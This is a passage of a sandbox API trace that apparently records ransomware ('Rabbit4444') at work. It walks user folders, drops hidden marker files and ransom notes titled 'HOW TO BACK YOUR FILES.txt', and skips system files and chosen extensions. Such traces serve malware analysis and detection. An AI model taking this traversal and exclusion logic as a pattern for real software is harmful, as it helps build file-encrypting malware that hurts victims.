ftLastWriteTime.dwLowDateTime=0xe972dd80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.904] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.904] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.904] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.904] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.904] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.904] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe972dd80, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe972dd80, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe972dd80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.904] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.904] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.904] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe972dd80, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe972dd80, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe972dd80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.904] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0053.904] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.904] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\headlights\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.905] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.905] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.906] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.906] CloseHandle (hObject=0x278) returned 1 [0053.906] CloseHandle (hObject=0x27c) returned 1 [0053.906] GetCurrentThreadId () returned 0xd98 [0053.906] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0053.906] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player" [0053.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120878 | out: hHeap=0xe0000) returned 1 [0053.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0053.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player" [0053.906] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\" [0053.906] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\.BFC0E91B00AE8A0620D3" [0053.906] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.908] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.910] FlushFileBuffers (hFile=0x27c) returned 1 [0053.911] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.912] CloseHandle (hObject=0x27c) returned 1 [0053.912] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player") returned 50 [0053.912] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.912] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9753fd1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0053.912] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.912] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.912] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.912] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.912] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9753fd1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.912] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.912] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.913] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.913] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.913] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.913] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9753fd1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9753fd1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9753fd1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.913] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.913] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.913] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5380e4e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe538be0f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AssetCache", cAlternateFileName="ASSETC~1")) returned 1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="Rabbit4444.exe") returned -1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2=".") returned 1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="..") returned 1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="windows") returned -1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="bootmgr") returned -1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="pagefile.sys") returned -1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="boot") returned -1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="ids.txt") returned -1 [0053.913] lstrcmpiW (lpString1="AssetCache", lpString2="NTUSER.DAT") returned -1 [0053.913] lstrcpyW (in: lpString1=0x130eb9e, lpString2="AssetCache" | out: lpString1="AssetCache") returned="AssetCache" [0053.913] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0053.913] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7c) returned 0x101c88 [0053.913] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6350 [0053.913] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe52e83dd, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="Rabbit4444.exe") returned -1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2=".") returned 1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="..") returned 1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="windows") returned -1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="bootmgr") returned 1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="pagefile.sys") returned -1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="boot") returned 1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="ids.txt") returned 1 [0053.913] lstrcmpiW (lpString1="NativeCache", lpString2="NTUSER.DAT") returned -1 [0053.913] lstrcpyW (in: lpString1=0x130eb9e, lpString2="NativeCache" | out: lpString1="NativeCache") returned="NativeCache" [0053.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0053.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7e) returned 0x102150 [0053.914] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6670 [0053.914] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe52e83dd, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 0 [0053.914] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0053.914] lstrcpyW (in: lpString1=0x130eb9e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.914] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.914] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.915] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.915] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.915] CloseHandle (hObject=0x278) returned 1 [0053.915] CloseHandle (hObject=0x27c) returned 1 [0053.915] GetCurrentThreadId () returned 0xd98 [0053.915] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0053.915] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0053.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0053.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0053.915] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0053.915] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\" [0053.915] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\.BFC0E91B00AE8A0620D3" [0053.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\nativecache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.918] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.921] FlushFileBuffers (hFile=0x27c) returned 1 [0053.922] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.922] CloseHandle (hObject=0x27c) returned 1 [0053.923] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 62 [0053.923] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.923] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9753fd1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0053.923] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.923] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.923] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.923] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.923] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9753fd1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.923] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.923] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.923] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.923] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.923] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.923] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9753fd1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9753fd1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9753fd1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.923] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.923] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.923] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe52e83dd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe52f2009, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NativeCache.directory", cAlternateFileName="NATIVE~1.DIR")) returned 1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2="Rabbit4444.exe") returned -1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2=".") returned 1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2="..") returned 1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2="windows") returned -1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2="bootmgr") returned 1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2="pagefile.sys") returned -1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2="boot") returned 1 [0053.923] lstrcmpiW (lpString1="NativeCache.directory", lpString2="ids.txt") returned 1 [0053.924] lstrcmpiW (lpString1="NativeCache.directory", lpString2="NTUSER.DAT") returned -1 [0053.924] lstrcpyW (in: lpString1=0x130ebb6, lpString2="NativeCache.directory" | out: lpString1="NativeCache.directory") returned="NativeCache.directory" [0053.924] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory", dwFileAttributes=0x0) returned 1 [0053.924] lstrlenW (lpString="NativeCache.directory") returned 21 [0053.924] lstrlenW (lpString="Rabbit4444") returned 10 [0053.925] lstrcmpiW (lpString1=".directory", lpString2="Rabbit4444") returned -1 [0053.925] lstrlenW (lpString=".dll") returned 4 [0053.925] lstrcmpiW (lpString1="tory", lpString2=".dll") returned 1 [0053.925] lstrlenW (lpString=".lnk") returned 4 [0053.925] lstrcmpiW (lpString1="tory", lpString2=".lnk") returned 1 [0053.925] lstrlenW (lpString=".ini") returned 4 [0053.925] lstrcmpiW (lpString1="tory", lpString2=".ini") returned 1 [0053.925] lstrlenW (lpString=".sys") returned 4 [0053.925] lstrcmpiW (lpString1="tory", lpString2=".sys") returned 1 [0053.925] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe52e83dd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe52f2009, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NativeCache.directory", cAlternateFileName="NATIVE~1.DIR")) returned 0 [0053.925] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0053.925] lstrcpyW (in: lpString1=0x130ebb6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.925] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\nativecache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.927] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.927] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.927] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.927] CloseHandle (hObject=0x278) returned 1 [0053.927] CloseHandle (hObject=0x27c) returned 1 [0053.927] GetCurrentThreadId () returned 0xd98 [0053.927] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0053.927] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0053.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0053.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0053.927] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0053.927] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0053.927] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.BFC0E91B00AE8A0620D3" [0053.928] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\assetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.929] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.931] FlushFileBuffers (hFile=0x27c) returned 1 [0053.932] SetFileAttributesW 